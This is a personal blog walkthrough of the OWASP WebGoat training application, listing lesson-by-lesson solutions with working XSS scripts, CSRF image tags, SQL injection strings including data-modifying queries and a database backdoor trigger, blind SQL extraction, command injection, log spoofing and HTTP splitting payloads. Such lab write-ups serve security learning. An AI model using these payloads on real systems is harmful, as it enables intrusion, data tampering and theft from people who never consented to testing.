Webgoat walkthrough

Hello guys
This is Shubham Choudhary back with some new and interesting stuff on cyber security. After a long time i prepared a new session about web application penetration testing which is a walkthrough of a vulnerable application webgoat.
WEBGOAT is a demo vulnerable application which is designed by OWASP to learn the practical approach of exploitation of different web vulnerabilities that may exist in real life application.
There are many blogs and information related to the vulnerability of website but they just stick to theoretical concepts so i decided to give you some practical hands on experience these vulnerabilities and it will help you to learn and grow in WAPT field.

General

1. Http Basics :- type user name in reverse format and submit

2. Http Splitting :- http redirect

en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 31
<html>Perdeu playboy!</html>
:- Cache poisioning
en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Oct 2222 15:27:28 GMT
Content-Length: 31
<html>Perdeu playboy!</html>

Access Control Flaws

1. Using an Access Control Matrix : User Larry is Account Manager
2. Bypass a Path Based Access Control Scheme
:- An interesting file to try and obtain might be a file like tomcat/conf/tomcat-users.xml
: Step1 :- select any file and Inspect Element and change the value="../../reportBug.jsp"
: Step2 :- View file

LAB: Role Base Access Control

Stage 1: Bypass Business Layer Access Control
user "Tomcat" pass "tom"
:- Open Burpsuit and start Interception (click on ViewProfile) and (change action=ViewProfile to action=DeleteProfile)

Stage 2:
(Developer Version of Webgoat)

Stage 3: Bypass Data Layer Access Control
User "Tomcat" Pass "tom"
:- Login with tomcat user and click on "SearchStaff" and type another Username like "Larry" and click on "Find Profile" and "EditProfile" chage the profile content and click on "update profile"

Stage 4:
(Developer Version of Webgoat)

Remote Admin Access

( Require Developer version of webgoat so i m skipping this)

Ajax Security

1. Same Origin Policy Protection:-

click here to try a same origin request (lessons/Ajax/sameOrigin.jsp)
submit Congratulation :- click here to try a different origin request (http://www/google.com/search?q=aspect+security)

2. LAB: DOM-Based cross-site scripting

stage 1: open the image location and copy and paste into script <IMG SRC="imgaes/logos/owasp.jpg"/>

stage 2: Type any (img src) alert script to complete stage <img src=x onerror="alert('any text')">

stage 3: use any (iframe alert script) to complete stage <iframe src=javascript:alert("Hacked!!")></iframe>

stage 4: copy and paste the code into column and type any password (submit)

stage 5: Open the file DOMXSS.js location : /owaspbwa/owaspbwa-svn/var/lib/tomcat6/webapps/WebGoat/javascript/escape.js on
server side
function displayGreeting(name) {
if (name != ''){
document.getElementById("greeting").innerHTML="Hello, " +escapeHTML(name)+ "!";
}
}
'And' finally write the escapeHTML(name) and save the file
go to clint side and run any (IMG SRC) alert script

3. LAB: Client Side Filtering

stage 1: select the choose employee and right click to (Inspect Element) and find the salary of Bartholomew's salary
(450000) and submit

stage 2: Open the file on server side (location: /var/lib/tomcat6/webapps/WebGoat/lessons/Ajax/clientSideFiltering.jsp)
and add this code
:)
Remplacer : Delete this code from the file
StringBuffer sb = new StringBuffer();
sb.append("/Employees/Employee/UserID | ");
sb.append("/Employees/Employee/FirstName | ");
sb.append("/Employees/Employee/LastName | ");
sb.append("/Employees/Employee/SSN | ");
sb.append("/Employees/Employee/Salary ");
String expression = sb.toString();
Par : And paste this code
StringBuffer sb = new StringBuffer();
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/UserID | ");
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/FirstName | ");
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/LastName | ");
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/SSN | ");
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/Salary ");
String expression = sb.toString();

4. DOM Injection

Enable Activate Button (Inspect Element) and Delete the "Disable field" [disable=""]

5. XML Injection

Copy your account ID 836239 And paste : submit

'And' check all the checkbox and Intercept the request and add the another checkbox field and change Checkbox I'd and
forward
:Congratulations:

6. JSON Injection

Right click on $600 and (Inspect Element) and change the price and submit

7. Silent Transactions Attacks

Right click and (Inspect Element) and goto console and submit this javascript
javascript:submitData(1234,99999999);

8. Dangerous Use of Eval

Paste This (alert Script) in three digit of Access code
Script:- 123');alert(document.cookie);('

9. Insecure Client Storage

Stage 1: Select whole items in Shopping Cart and (Inspect Element) goto "Console" and paste this JAVA script
Script :- javascript:alert(decrypt('emph'));

Stage 2: Type your Old Coupon code "GOLD"/another and intercept the "Purchase Request" and chage ( GRANDTOT=%0 ) and Forward the request
:Congratulation:

Authentication Flaws

1. Password Strength
How Much time you need for these passwords?
password = 123456 (0)seconds
password = abzfez (1394)seconds
password = a9z1ez (5)hours
password = aB8fEz (2)days
password = z8!E?7 (41)days

Type these Values in blank column (Because the Website {https://www.cnlab.ch/codecheck} is not availabe for This Version of WebGoat)
And press GO

2. Forgot Password

Username: admin
Color: green

3. Basic Authentication

Intercept the Submit request using Burpsuit and copy Authorization: Basic (base64) hash
and paste in the authentication header: (Authorization)
decode the value authentication header: (guest:guest)
Submit : Congratulation
After this Congratulation success (Type same guest:guest@ in the url) like http://guest:guest@192.168.1.20/Webgoat
restart the machine
:COMPLETED:

4. Multi Level Login 2

Try This Lesson After you have complete the (Multi Level Lovin 1)
Login as username: Joe and password: banana)
and type the TAN which you want to show And Intercept the request and change of Joe to Jane and forward the request

5. Multi Level Login 1

stage 1: Login using username and password :Jane:tarzan: use Tan1
After this
stage 2: Login again using same things
And Inspect the value of Tan2 and change the Tan value to 1
Submit:congratulation:

Buffer Overflows :

Off-by-one Overflows

step 1: Login with any username and type any Room no
and select (Web Developer) addons and show hidden field and typpe 4096 Characters in "Room No" filed and click on Accept
and click on (webDeveloper) and show hidden field
Step 2: Now choose the VIP Hotel member and Loing with the username and RoomNo

Code Quality:

Discover Clues in the HTML
press (CTRL+U) to view the source code of Html and find the weekness in the code
(In green field FIXME's:- admin:adminpw)

Concurrency:

1. Thread Safety Problems

Open two browsers and type username "Jeff" in First browsers and "Dave" in another Browser
and click on Submit Button at the same time
Congratulation :

2. Shopping Cart Concurrency Flaws
step 1: Open two browser and Select 1 Product 169$ in One browser
and second browser select same product with high quantity like 10 pcs
step 2: first browser click on "update and purchase" and second browser click on "update cart"
and click on first browser click on "confirm"
Congratulation :

Cross Site Scriptiong (XSS)

1. Phishing with XSS :

Paste this script in the search tab and click on search

2. LAB: Cross SIte Scripting

stage 1: stored XSS :- Login with username "Tom Cat" and password is "tom" and click on "ViewProfile" click on "EditProfile"

and Paste this script into the "street column"

script: <script>alert('You\'ve been hacked by Tom');</script>and click on "UpdateProfile" and (EditProfile and logout) After this Login with username "Jerry" password "jerry"

and click on view profile

Congratulation::

Stage 2: Block Stored XSS using input Validation

(Developer Version of Webgoat)

Stage 3: Stored XSS Revisited

Congratulation::

Stage 4: Block Stored XSS using Output Encoding

(Developer version of WebGoat)

Stage 5: Reflected XSS

script:- <script>alert('vulnerable form');</script>

Congratulation::

Stage 6: Block Reflected XSS

(Developer Version of Webgoat)

3. Stored XSS Attacks:-
Type any Title name and paste this script into Message box and click on Submit

Script:- <script>alert('vulnerable form');</script>

4. Reflected XSS Attack:-
Paste this Scrip into (Three digit access code)

Script:- <script>alert('vulnerable form');</script>

5. Cross Site Request Forgery (CSRF) :-
type any title and paste this script into "message box" click on submit

Script:- <img src="http://localhost:8080/WebGoat/attack?Screen=13&menu=900&transferFunds=5000" width="1"

height="1" />

6. CSRF Promt By-pass:-
type any title and paste this script into "message box" click on submit

Script:-

(And Refresh your Page Congratulation:::)

7. CSRF Token Bypass:-
type any title and paste this script into "message box" click on submitScript:- <img src="http://localhost:8080/WebGoat/attack?Screen=13&menu=900&transferFunds=4000&transferFunds=main" width="1"height="1" />

and submit

Congratulation:::

8. HTTP Only test:-
Simple one time select "no" and (click on read cookie and write cookie)

And Second time select "yes" and (click on read cookie and write cookie)

9. Cross Site Tracing (XST) Attacks:-
Enter this Script into (Three digit security code field) and click on Purchase

Script:-

var xhr = new XMLHttpRequest();

xhr.open('TRACE', 'http://test.lab/', false);

xhr.send(null);

if(200 == xhr.status)

alert(xhr.responseText);

</script>

Improper Error Handling

Fail Open Authentication Scheme

Type username "Admin" and (Inspect the password) field and Delete the password field
Congratulation:::

Injection Flaws

1. Command Injection :-

1st we need to remove drop down box
we can do using web developer>forms>convert select element to form
than we can inject command directly like "& ipconfig"

2. Numeric Sql Injection:-

Select Columbia and intercept the request and type (SQL Injection query) into the tempreture field

like (101 or 1=1) and forward the request

3. Log Spoofing:-

Part 1
type in user name "Lim%0d%0aLogin succeeded for username:admin"
part2
add script also "Lim%0d%0aLogin succeeded for username:admin<script>alert("Admin login sucessful")</script>"

4. XPATH Injection:-

Type this code into username field (a' or 1=1 or 'a'='a) and password field (hack)

Congratulation:::

5. String SQL Injection:-

Type this code into Your Last Name field and hit enter (a' or 1=1 or 'a'='a)

6. LAB: SQL Injection

Stage 1: String Sql Injection

Login with username "Neville" and type "any password" into password field and (intercept the request) and type sql string into password field

(a' or 1='1) and forward the request.

Stage 2: Parameterized Query

(Developer version of Webgoat)

Stage 3: Numeric SQL injection

Login with username "Larry" password "larry" and intercept larry (view profile) and edit the larry profile id with this code

(101 or 1=1 order by salary desc)

Congratulation:::

Stage 4: Parameterized Query

(Developer version of Webgoat)

7. Modify Data with SQL injection:-

paste this SQL String (jsmith';update salaries set salary=100000 where userid='jsmith) in "Enter your userid"

8. Add Data with SQL injection:-

Paste this SQL String (jsmith';insert into salaries values('nome',10);--) in "enter your userid"

9. Database Backdoors:-

Stage 1: Paste this query in the "userid" column (101;update salaries set salary=100000 where userid=101)

Stage 2: Paste this second query (CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid)

10. Numeric Blind SQL injection:-
Type this SQL string in Account Number field

{(101 AND (SELECT pin FROM pins WHERE cc_number='1111222233334444') = 2364 ); }

and Account number is Valid

answer is (2364)

11. Blind String SQL Injection:- "This session is very much like the previous session.

Step 1: using This code to confirm the name is "J"

{101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) = 'J' );}

Step 2: Repeate this with the 2nd letter either using the < or > sign to reduce the range. follow by the = sign to confirm the letter

{101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) = 'i' );}

The second letter is "i" So the name is Ji**.

IF you Continue the process, you will find the name is "Jill".

or

101 AND (SELECT ASCII(SUBSTR(name,1,1)) from pins WHERE cc_number=4321432143214321) =$ --

intercept and send to intruder brute force on place of first 1 (from no. 1 to 5)and $(from no. 70 to 120)
enter the correct value in the above command found though intruder
enter the name found

Denial of Service

Denial of Service from Multiple Logins :-

Login with SQL string username (1' or 1='1) password (1' or 1='1) And choose any three user and LOgin

Congratulation::::

Insecure Configuration

Forced Browsing:-

(192.168.1.100/WebGoat/attack?Screen=37&menu=1400&succeeded=yes) (192.168.1.100/WebGoat/conf) changes in url and hit enter.

Congratulation:::

Insecure Storage

Encoding Basics:-
enter the string "abc" in the list below you see the encoded value of the string. For Rot13 encoding this is nop

now enter the string "a c" and chek for url encoding

answer: a+c Congratulation::::

Malicious File Execution

Save this code in ".jsp" file and upload it

(Right click on image and click on copy image location) & (Open new Tab and paste it & refresh webgoat page)

Congratulation:::

Parameter Tampring

1. Bypass HTML Field Restrictions:-

Step 1: Inspect the (Disable input field) and enable it and type anyting

Step 2: Intercept request and change all the fileds and "forward request"

Like this: select=foo&radio=foo&checkbox=on&shortinput=12345&disabledinput=kjsdakl&SUBMIT=Submit

(select=foo123&radio=foo123&checkbox=on&shortinput=12345123&disabledinput=kjsdakl123&SUBMIT=Submit123)

2. Exploit Hidden Fields:-

Intercept Request and change Price of HDTV

3. Exploit Unchecked Email:-

Step 1: paste any alert script in Comments box : <script>alert('hacked');</script> : and Send

Step 2: Paste any alert script in comments box : <script>alert('hacked2');</script> : & click on send and Intercept the request (change Admin to Guest) and forward the request

4. Bypass Client Side JavaScript Validation:-

Intercept the Request and change the all field to (oposite) and forward request

Session Management Flaws

Hijack a session

intercept the request and delete the WEAKID field and intercept the response

select the WEAKID and snd it the sequencer anlyse and save token in a file to compare sort the token file find missing no. in first half send it to intruder and bruteforce in second half last two no.(check for range in sorted list gap)

once done refresh page

Spoof an authentication session

Session Fixation attack

stage 1:

add &SID=whatever at the end of href tag

stage 2:

click on got hills financial

stage 3:

stage 4:

first change SID=NOVALIDPASS to SID=whatever in url

change SID=NOVALIDPASS to SID=whatever in url

refresh page

Web Services

1. Create a SOAP Request:

Stage 1: How many operations are defined in the WSDL:- Right click on (Webgoat WSDL FILE) and open it to another tab and find (SOAP Request)

<wsdl:portType name="SoapRequest">

1.<wsdl:operation name="getFirstName" parameterOrder="id">

<wsdl:input message="impl:getFirstNameRequest" name="getFirstNameRequest"/>

<wsdl:output message="impl:getFirstNameResponse" name="getFirstNameResponse"/>

</wsdl:operation>

2.<wsdl:operation name="getLastName" parameterOrder="id">

<wsdl:input message="impl:getLastNameRequest" name="getLastNameRequest"/>

<wsdl:output message="impl:getLastNameResponse" name="getLastNameResponse"/>

</wsdl:operation>

3.<wsdl:operation name="getCreditCard" parameterOrder="id">

<wsdl:input message="impl:getCreditCardRequest" name="getCreditCardRequest"/>

<wsdl:output message="impl:getCreditCardResponse" name="getCreditCardResponse"/>

</wsdl:operation>

4.<wsdl:operation name="getLoginCount" parameterOrder="id">

<wsdl:input message="impl:getLoginCountRequest" name="getLoginCountRequest"/>

<wsdl:output message="impl:getLoginCountResponse" name="getLoginCountResponse"/>

</wsdl:operation>

And you see 4 Operations in "Soap Request"

(answer= 4)

Stage 2: read the service code again for the parameter type the type is "int"

<wsdl:message name="getLastNameRequest">

<wsdl:part name="id" type="xsd:int"/>

Stage 3: Press to generate HTTP request

(NOt Complete)

WSDL scaning

open wsdl file check all methods there is a method of getCreditCard
now select option intercept method and change it to getCreditCard

Web service SAX injection

inject in password field

newpassword</password>
</wsns1:changePassword>
<wsns1:changePassword>
<id xsi:type='xsd:int'>102</id>
<password xsi:type='xsd:string'>notforyoutoknow

Challenge

stage 1:
check the java source file using this link
http://localhost:8080/WebGoat/source?source=true

stage 2:
intercept the post request with the help of web scarab and change the value white to white'or'1'='1

NOTE:-get a professional training of web application penetration testing at shubhamchoudharyhacker.com

Shubham Choudhary | Hacker

Thursday, 1 February 2018

Webgoat walkthrough

General

Access Control Flaws

LAB: Role Base Access Control

Remote Admin Access

Ajax Security

1. Same Origin Policy Protection:-

2. LAB: DOM-Based cross-site scripting

3. LAB: Client Side Filtering

4. DOM Injection

5. XML Injection

6. JSON Injection

7. Silent Transactions Attacks

8. Dangerous Use of Eval

9. Insecure Client Storage

Authentication Flaws

Buffer Overflows :

Code Quality:

Concurrency:

Cross Site Scriptiong (XSS)

Improper Error Handling

Fail Open Authentication Scheme

Injection Flaws

7. Modify Data with SQL injection:-

paste this SQL String (jsmith';update salaries set salary=100000 where userid='jsmith) in "Enter your userid"

Denial of Service

Insecure Configuration

Forced Browsing:-

Malicious File Execution

Parameter Tampring

2. Exploit Hidden Fields:-

Intercept Request and change Price of HDTV

Session Management Flaws

Web Services

Challenge

Blog Archive